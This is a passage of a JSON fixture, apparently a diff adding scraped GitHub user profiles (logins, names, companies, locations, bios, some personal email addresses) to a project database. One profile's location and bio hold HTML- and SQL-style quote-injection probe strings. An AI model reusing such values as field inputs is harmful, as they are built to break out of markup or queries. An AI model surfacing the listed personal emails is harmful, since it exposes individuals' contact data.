"2024-09-11T21:37:01.275Z", + "nest_updated_at": "2024-09-11T21:37:01.275Z", + "name": "", + "login": "bmscodespace", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/156448204?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-01-12T15:12:23Z", + "updated_at": "2024-02-15T08:41:31Z", + "node_id": "U_kgDOCVM1zA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 773, + "fields": { + "nest_created_at": "2024-09-11T21:37:02.082Z", + "nest_updated_at": "2024-09-22T19:45:05.911Z", + "name": "Sven Strickroth", + "login": "csware", + "email": "email@cs-ware.de", + "avatar_url": "https://avatars.githubusercontent.com/u/428133?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 22, + "public_gists_count": 1, + "public_repositories_count": 61, + "created_at": "2010-10-05T15:18:11Z", + "updated_at": "2024-08-03T09:59:23Z", + "node_id": "MDQ6VXNlcjQyODEzMw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 774, + "fields": { + "nest_created_at": "2024-09-11T21:37:03.770Z", + "nest_updated_at": "2024-09-12T00:34:30.646Z", + "name": "Alexander Veit", + "login": "veita", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/419665?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 50, + "created_at": "2010-09-28T19:20:25Z", + "updated_at": "2024-09-03T06:16:35Z", + "node_id": "MDQ6VXNlcjQxOTY2NQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 775, + "fields": { + "nest_created_at": "2024-09-11T21:37:05.460Z", + "nest_updated_at": "2024-09-11T21:37:05.460Z", + "name": "", + "login": "RyosukeFukatani", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/88311926?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2021-08-02T07:47:17Z", + "updated_at": "2024-06-11T01:19:40Z", + "node_id": "MDQ6VXNlcjg4MzExOTI2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 776, + "fields": { + "nest_created_at": "2024-09-11T21:37:06.291Z", + "nest_updated_at": "2024-09-11T21:37:06.291Z", + "name": "", + "login": "hw30026125", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/166632890?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-04-10T14:52:19Z", + "updated_at": "2024-08-22T09:11:12Z", + "node_id": "U_kgDOCe6dug", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 777, + "fields": { + "nest_created_at": "2024-09-11T21:37:07.094Z", + "nest_updated_at": "2024-09-22T19:27:41.327Z", + "name": "Damian Szczepanik", + "login": "damianszczepanik", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9612911?v=4", + "company": "", + "location": "Poland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 275, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2014-11-07T17:42:11Z", + "updated_at": "2024-08-05T15:06:02Z", + "node_id": "MDQ6VXNlcjk2MTI5MTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 778, + "fields": { + "nest_created_at": "2024-09-11T21:37:07.913Z", + "nest_updated_at": "2024-09-11T21:37:07.913Z", + "name": "Tom Mayer", + "login": "tom-mayer", + "email": "tom.f.mayer@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2562379?v=4", + "company": "KontextWork", + "location": "Freiburg", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2012-10-15T08:06:35Z", + "updated_at": "2024-09-11T06:04:18Z", + "node_id": "MDQ6VXNlcjI1NjIzNzk=", + "bio": "I don't appreciate your lack of sarcasm", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 779, + "fields": { + "nest_created_at": "2024-09-11T21:37:08.762Z", + "nest_updated_at": "2024-09-11T21:37:08.762Z", + "name": "", + "login": "JuanMiguelBG-Ticarum", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/153169290?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2023-12-07T07:24:09Z", + "updated_at": "2023-12-07T07:24:09Z", + "node_id": "U_kgDOCSEtig", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 780, + "fields": { + "nest_created_at": "2024-09-11T21:37:09.584Z", + "nest_updated_at": "2024-09-11T21:37:09.584Z", + "name": "Cruz Maximilien", + "login": "DeepSnowNeeL", + "email": "maximilien.cruz@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10205672?v=4", + "company": "hiji", + "location": "France", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 15, + "public_gists_count": 5, + "public_repositories_count": 11, + "created_at": "2014-12-16T08:20:17Z", + "updated_at": "2024-04-11T23:10:23Z", + "node_id": "MDQ6VXNlcjEwMjA1Njcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 781, + "fields": { + "nest_created_at": "2024-09-11T21:37:10.385Z", + "nest_updated_at": "2024-09-11T21:37:10.385Z", + "name": "John L. Czukkermann", + "login": "jlczuk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8922067?v=4", + "company": "@github.ibm.com", + "location": "Poughkeepsie, NY, USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2014-09-26T00:04:33Z", + "updated_at": "2024-08-29T17:03:22Z", + "node_id": "MDQ6VXNlcjg5MjIwNjc=", + "bio": "Senior Engineer at IBM Corp. Working on design and development of REST APIs for z/OS. Constantly looking for ways to improve continuous integration/build/test", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 782, + "fields": { + "nest_created_at": "2024-09-11T21:37:11.260Z", + "nest_updated_at": "2024-09-11T21:37:11.260Z", + "name": "", + "login": "sumitkumar1110", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/135202437?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-06-01T06:05:29Z", + "updated_at": "2024-07-31T14:02:07Z", + "node_id": "U_kgDOCA8GhQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 783, + "fields": { + "nest_created_at": "2024-09-11T21:37:12.143Z", + "nest_updated_at": "2024-09-22T19:45:04.110Z", + "name": "", + "login": "kkiro-coder", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42226503?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 60, + "created_at": "2018-08-09T02:14:37Z", + "updated_at": "2024-09-08T07:15:57Z", + "node_id": "MDQ6VXNlcjQyMjI2NTAz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 784, + "fields": { + "nest_created_at": "2024-09-11T21:37:22.684Z", + "nest_updated_at": "2024-09-11T21:37:23.066Z", + "name": "", + "login": "markthagan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63845079?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-04-17T08:42:13Z", + "updated_at": "2023-02-03T13:42:55Z", + "node_id": "MDQ6VXNlcjYzODQ1MDc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 785, + "fields": { + "nest_created_at": "2024-09-11T21:37:25.939Z", + "nest_updated_at": "2024-09-11T21:37:25.939Z", + "name": "", + "login": "dansiviter", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1540398?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2012-03-15T13:21:03Z", + "updated_at": "2024-09-10T18:29:09Z", + "node_id": "MDQ6VXNlcjE1NDAzOTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 786, + "fields": { + "nest_created_at": "2024-09-11T21:37:27.159Z", + "nest_updated_at": "2024-09-11T21:37:27.159Z", + "name": "", + "login": "binhjy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16265532?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2015-12-12T08:59:00Z", + "updated_at": "2024-05-22T16:21:44Z", + "node_id": "MDQ6VXNlcjE2MjY1NTMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 787, + "fields": { + "nest_created_at": "2024-09-11T21:37:27.979Z", + "nest_updated_at": "2024-09-11T21:37:27.979Z", + "name": "", + "login": "Soham-Sagar-007", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84324012?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-05-17T11:48:16Z", + "updated_at": "2024-01-25T07:01:12Z", + "node_id": "MDQ6VXNlcjg0MzI0MDEy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 788, + "fields": { + "nest_created_at": "2024-09-11T21:37:28.792Z", + "nest_updated_at": "2024-09-22T18:27:47.622Z", + "name": "Yannis", + "login": "Yannis-01", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28657103?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-05-12T17:19:17Z", + "updated_at": "2024-06-28T09:31:49Z", + "node_id": "MDQ6VXNlcjI4NjU3MTAz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 789, + "fields": { + "nest_created_at": "2024-09-11T21:37:44.010Z", + "nest_updated_at": "2024-09-11T21:37:44.010Z", + "name": "Kevin W. Wall - work", + "login": "kwwall-gri", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87679331?v=4", + "company": "Guaranteed Rate", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-07-20T00:28:54Z", + "updated_at": "2022-01-05T14:52:08Z", + "node_id": "MDQ6VXNlcjg3Njc5MzMx", + "bio": "kwwall's work alter ego. My day job when not doing ESAPI things.", + "is_hireable": false, + "twitter_username": "KevinWWall" + } +}, +{ + "model": "github.user", + "pk": 790, + "fields": { + "nest_created_at": "2024-09-11T21:37:45.719Z", + "nest_updated_at": "2024-09-11T21:37:45.719Z", + "name": "", + "login": "paul-redwood", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/167766640?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-04-22T11:06:10Z", + "updated_at": "2024-05-17T16:57:28Z", + "node_id": "U_kgDOCf_qcA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 791, + "fields": { + "nest_created_at": "2024-09-11T21:37:47.406Z", + "nest_updated_at": "2024-09-22T19:45:26.861Z", + "name": "Jeremy Long", + "login": "jeremylong", + "email": "jeremy.long@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/862914?v=4", + "company": "", + "location": "Oak Hill, VA", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 961, + "public_gists_count": 6, + "public_repositories_count": 60, + "created_at": "2011-06-20T23:01:08Z", + "updated_at": "2024-08-12T11:45:00Z", + "node_id": "MDQ6VXNlcjg2MjkxNA==", + "bio": "Founder and project lead for dependency-check.", + "is_hireable": false, + "twitter_username": "ctxt" + } +}, +{ + "model": "github.user", + "pk": 792, + "fields": { + "nest_created_at": "2024-09-11T21:38:06.078Z", + "nest_updated_at": "2024-09-11T21:38:06.078Z", + "name": "Mark Gordon", + "login": "cognish", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2207236?v=4", + "company": "", + "location": "Alberta, Canada", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2012-08-23T21:11:30Z", + "updated_at": "2023-12-31T19:22:02Z", + "node_id": "MDQ6VXNlcjIyMDcyMzY=", + "bio": "I build software. My superpower is explaining complex things simply. #devsecops #abcd", + "is_hireable": true, + "twitter_username": "cognish" + } +}, +{ + "model": "github.user", + "pk": 793, + "fields": { + "nest_created_at": "2024-09-11T21:38:23.659Z", + "nest_updated_at": "2024-09-11T21:38:23.659Z", + "name": "Alena Dubeshko", + "login": "belalena", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48951078?v=4", + "company": "", + "location": "Belarus", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-03-26T12:01:11Z", + "updated_at": "2023-10-16T08:50:24Z", + "node_id": "MDQ6VXNlcjQ4OTUxMDc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 794, + "fields": { + "nest_created_at": "2024-09-11T21:38:25.738Z", + "nest_updated_at": "2024-09-11T21:38:25.738Z", + "name": "", + "login": "carllaw6885", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60469898?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2020-01-30T11:37:25Z", + "updated_at": "2024-07-27T07:35:31Z", + "node_id": "MDQ6VXNlcjYwNDY5ODk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 795, + "fields": { + "nest_created_at": "2024-09-11T21:38:27.848Z", + "nest_updated_at": "2024-09-22T20:25:19.588Z", + "name": "Elar Lang", + "login": "elarlang", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47597707?v=4", + "company": "", + "location": "Estonia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-02-13T12:04:41Z", + "updated_at": "2024-07-23T07:35:06Z", + "node_id": "MDQ6VXNlcjQ3NTk3NzA3", + "bio": "", + "is_hireable": false, + "twitter_username": "elarlang" + } +}, +{ + "model": "github.user", + "pk": 796, + "fields": { + "nest_created_at": "2024-09-11T21:38:30.275Z", + "nest_updated_at": "2024-09-22T20:25:20.220Z", + "name": "Isaac Lewis", + "login": "ike", + "email": "isaac@ike.io", + "avatar_url": "https://avatars.githubusercontent.com/u/943641?v=4", + "company": "SIGN Fracture Care", + "location": "\">", + "collaborators_count": 0, + "following_count": 66, + "followers_count": 47, + "public_gists_count": 13, + "public_repositories_count": 59, + "created_at": "2011-07-28T05:23:45Z", + "updated_at": "2024-07-29T21:33:00Z", + "node_id": "MDQ6VXNlcjk0MzY0MQ==", + "bio": "ike ' or 1 != \" is a software developer and application security specialist with experience leading, planning, and implementing migrations of legacy codebases", + "is_hireable": false, + "twitter_username": "ki11ick" + } +}, +{ + "model": "github.user", + "pk": 797, + "fields": { + "nest_created_at": "2024-09-11T21:38:33.234Z", + "nest_updated_at": "2024-09-11T21:38:33.234Z", + "name": "Josh", + "login": "josh-hemphill", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46608115?v=4", + "company": "USA", + "location": "Washington", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 12, + "public_gists_count": 11, + "public_repositories_count": 84, + "created_at": "2019-01-11T18:51:56Z", + "updated_at": "2024-08-25T11:45:16Z", + "node_id": "MDQ6VXNlcjQ2NjA4MTE1", + "bio": "Full Stack developer and hobbyist\r\nLove Javascript and the JS ecosystem", + "is_hireable": true, + "twitter_username": "spooklogical" + } +}, +{ + "model": "github.user", + "pk": 798, + "fields": { + "nest_created_at": "2024-09-11T21:38:37.785Z", + "nest_updated_at": "2024-09-11T21:38:37.785Z", + "name": "Yonah Russ", + "login": "yruss972", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1858636?v=4", + "company": "Plarium Global", + "location": "Israel", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 4, + "public_repositories_count": 28, + "created_at": "2012-06-17T10:15:02Z", + "updated_at": "2024-09-03T13:43:32Z", + "node_id": "MDQ6VXNlcjE4NTg2MzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "yruss972" + } +}, +{ + "model": "github.user", + "pk": 799, + "fields": { + "nest_created_at": "2024-09-11T21:38:47.927Z", + "nest_updated_at": "2024-09-22T20:25:19.901Z", + "name": "Daniel Cuthbert", + "login": "danielcuthbert", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7882621?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 108, + "public_gists_count": 1, + "public_repositories_count": 46, + "created_at": "2014-06-13T17:35:17Z", + "updated_at": "2024-09-20T11:57:17Z", + "node_id": "MDQ6VXNlcjc4ODI2MjE=", + "bio": "", + "is_hireable": false, + "twitter_username": "dcuthbert" + } +}, +{ + "model": "github.user", + "pk": 800, + "fields": { + "nest_created_at": "2024-09-11T21:38:53.228Z", + "nest_updated_at": "2024-09-22T20:25:23.069Z", + "name": "Sjoerd Langkemper", + "login": "Sjord", + "email": "sjoerd-github@linuxonly.nl", + "avatar_url": "https://avatars.githubusercontent.com/u/113030?v=4", + "company": "", + "location": "Haarlem, The Netherlands", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 192, + "public_gists_count": 6, + "public_repositories_count": 167, + "created_at": "2009-08-07T20:12:28Z", + "updated_at": "2024-03-29T08:49:29Z", + "node_id": "MDQ6VXNlcjExMzAzMA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 801, + "fields": { + "nest_created_at": "2024-09-11T21:39:04.482Z", + "nest_updated_at": "2024-09-22T20:25:47.895Z", + "name": "", + "login": "mjang-cobalt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84352037?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2021-05-17T20:42:10Z", + "updated_at": "2024-09-13T19:11:01Z", + "node_id": "MDQ6VXNlcjg0MzUyMDM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 802, + "fields": { + "nest_created_at": "2024-09-11T21:39:35.103Z", + "nest_updated_at": "2024-09-11T21:39:35.103Z", + "name": "", + "login": "1songb1rd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/102816165?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-04-01T15:02:13Z", + "updated_at": "2022-04-01T15:52:14Z", + "node_id": "U_kgDOBiDZpQ", + "bio": "https://www.linkedin.com/in/positiveassurance/", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 803, + "fields": { + "nest_created_at": "2024-09-11T21:39:53.570Z", + "nest_updated_at": "2024-09-22T20:25:35.335Z", + "name": "Shanni Prutchi", + "login": "EnigmaRosa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47675904?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2019-02-15T20:24:13Z", + "updated_at": "2024-09-09T01:29:19Z", + "node_id": "MDQ6VXNlcjQ3Njc1OTA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 804, + "fields": { + "nest_created_at": "2024-09-11T21:40:19.286Z", + "nest_updated_at": "2024-09-11T21:40:19.286Z", + "name": "Arun Sivadasan", + "login": "teavanist", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37803648?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 17, + "public_repositories_count": 14, + "created_at": "2018-03-26T13:11:44Z", + "updated_at": "2024-08-27T11:39:49Z", + "node_id": "MDQ6VXNlcjM3ODAzNjQ4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 805, + "fields": { + "nest_created_at": "2024-09-11T21:40:23.005Z", + "nest_updated_at": "2024-09-11T21:40:23.005Z", + "name": "Gerrit Padgham", + "login": "weasel0x00", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1728630?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2012-05-11T01:42:35Z", + "updated_at": "2023-04-21T13:17:07Z", + "node_id": "MDQ6VXNlcjE3Mjg2MzA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 806, + "fields": { + "nest_created_at": "2024-09-11T21:40:31.974Z", + "nest_updated_at": "2024-09-22T20:25:22.115Z", + "name": "", + "login": "JoergBruenner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/79036211?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-02-14T06:15:00Z", + "updated_at": "2024-09-12T13:48:51Z", + "node_id": "MDQ6VXNlcjc5MDM2MjEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 807, + "fields": { + "nest_created_at": "2024-09-11T21:40:57.051Z", + "nest_updated_at": "2024-09-11T21:40:57.051Z", + "name": "", + "login": "leirn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5393005?v=4", + "company": "", + "location": "Paris, France", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2013-09-05T16:50:59Z", + "updated_at": "2024-08-26T18:11:35Z", + "node_id": "MDQ6VXNlcjUzOTMwMDU=", + "bio": "Mostly harmless", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 808, + "fields": { + "nest_created_at": "2024-09-11T21:41:02.502Z", + "nest_updated_at": "2024-09-11T21:41:06.646Z", + "name": "David Deatherage", + "login": "securitydave", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/112591783?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-08-31T23:00:52Z", + "updated_at": "2023-07-09T14:44:15Z", + "node_id": "U_kgDOBrYDpw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 809, + "fields": { + "nest_created_at": "2024-09-11T21:41:43.472Z", + "nest_updated_at": "2024-09-11T21:41:43.472Z", + "name": "", + "login": "appills", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20586284?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2016-07-21T21:03:29Z", + "updated_at": "2024-01-30T17:06:35Z", + "node_id": "MDQ6VXNlcjIwNTg2Mjg0", + "bio": "meh", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 810, + "fields": { + "nest_created_at": "2024-09-11T21:41:51.705Z", + "nest_updated_at": "2024-09-22T06:42:24.904Z", + "name": "BitnessWise", + "login": "bitnesswise", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32780182?v=4", + "company": "BitnessWise", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2017-10-13T19:44:18Z", + "updated_at": "2024-01-02T21:19:38Z", + "node_id": "MDQ6VXNlcjMyNzgwMTgy", + "bio": "", + "is_hireable": false, + "twitter_username": "BitnessWise" + } +}, +{ + "model": "github.user", + "pk": 811, + "fields": { + "nest_created_at": "2024-09-11T21:42:23.702Z", + "nest_updated_at": "2024-09-11T21:42:24.096Z", + "name": "", + "login": "craig-shony", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/79337339?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-02-19T21:04:04Z", + "updated_at": "2024-02-07T15:22:12Z", + "node_id": "MDQ6VXNlcjc5MzM3MzM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 812, + "fields": { + "nest_created_at": "2024-09-11T21:42:25.751Z", + "nest_updated_at": "2024-09-22T19:39:27.817Z", + "name": "Ali Ramazan TAŞDELEN", + "login": "alitasdln", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66968278?v=4", + "company": "HIRE ME", + "location": "root@target:~#", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2020-06-15T18:05:45Z", + "updated_at": "2024-08-28T12:45:24Z", + "node_id": "MDQ6VXNlcjY2OTY4Mjc4", + "bio": "Aspiring Application Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 813, + "fields": { + "nest_created_at": "2024-09-11T21:42:34.850Z", + "nest_updated_at": "2024-09-22T20:25:15.839Z", + "name": "Tobias Ahnoff", + "login": "TobiasAhnoff", + "email": "tobias.ahnoff@omegapoint.se", + "avatar_url": "https://avatars.githubusercontent.com/u/2394007?v=4", + "company": "Omegapoint", + "location": "Sweden", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2012-09-21T14:32:20Z", + "updated_at": "2024-08-05T10:57:32Z", + "node_id": "MDQ6VXNlcjIzOTQwMDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 814, + "fields": { + "nest_created_at": "2024-09-11T21:42:47.080Z", + "nest_updated_at": "2024-09-22T20:25:49.478Z", + "name": "Riccardo Sirigu", + "login": "ricsirigu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5004093?v=4", + "company": "Abissi", + "location": "Sardinia, IT", + "collaborators_count": 0, + "following_count": 210, + "followers_count": 34, + "public_gists_count": 19, + "public_repositories_count": 70, + "created_at": "2013-07-13T19:30:39Z", + "updated_at": "2024-09-16T11:27:51Z", + "node_id": "MDQ6VXNlcjUwMDQwOTM=", + "bio": "CISSP, Head Of Application Security", + "is_hireable": false, + "twitter_username": "ricsirigu" + } +}, +{ + "model": "github.user", + "pk": 815, + "fields": { + "nest_created_at": "2024-09-11T21:43:12.184Z", + "nest_updated_at": "2024-09-22T18:40:00.969Z", + "name": "Jordan Sherman", + "login": "deleterepo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10911975?v=4", + "company": "Forward Security ", + "location": "Toronto", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 5, + "public_repositories_count": 52, + "created_at": "2015-02-08T19:13:39Z", + "updated_at": "2024-08-05T17:21:12Z", + "node_id": "MDQ6VXNlcjEwOTExOTc1", + "bio": "aka @jsherm-fwdsec", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 816, + "fields": { + "nest_created_at": "2024-09-11T22:08:42.117Z", + "nest_updated_at": "2024-09-11T22:08:42.117Z", + "name": "", + "login": "fluentsharp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7695278?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2014-05-25T15:50:05Z", + "updated_at": "2016-05-29T11:24:28Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjc2OTUyNzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 817, + "fields": { + "nest_created_at": "2024-09-11T22:08:47.436Z", + "nest_updated_at": "2024-09-22T18:30:10.819Z", + "name": "", + "login": "ebranca", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/866040?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 20, + "public_gists_count": 0, + "public_repositories_count": 2, + 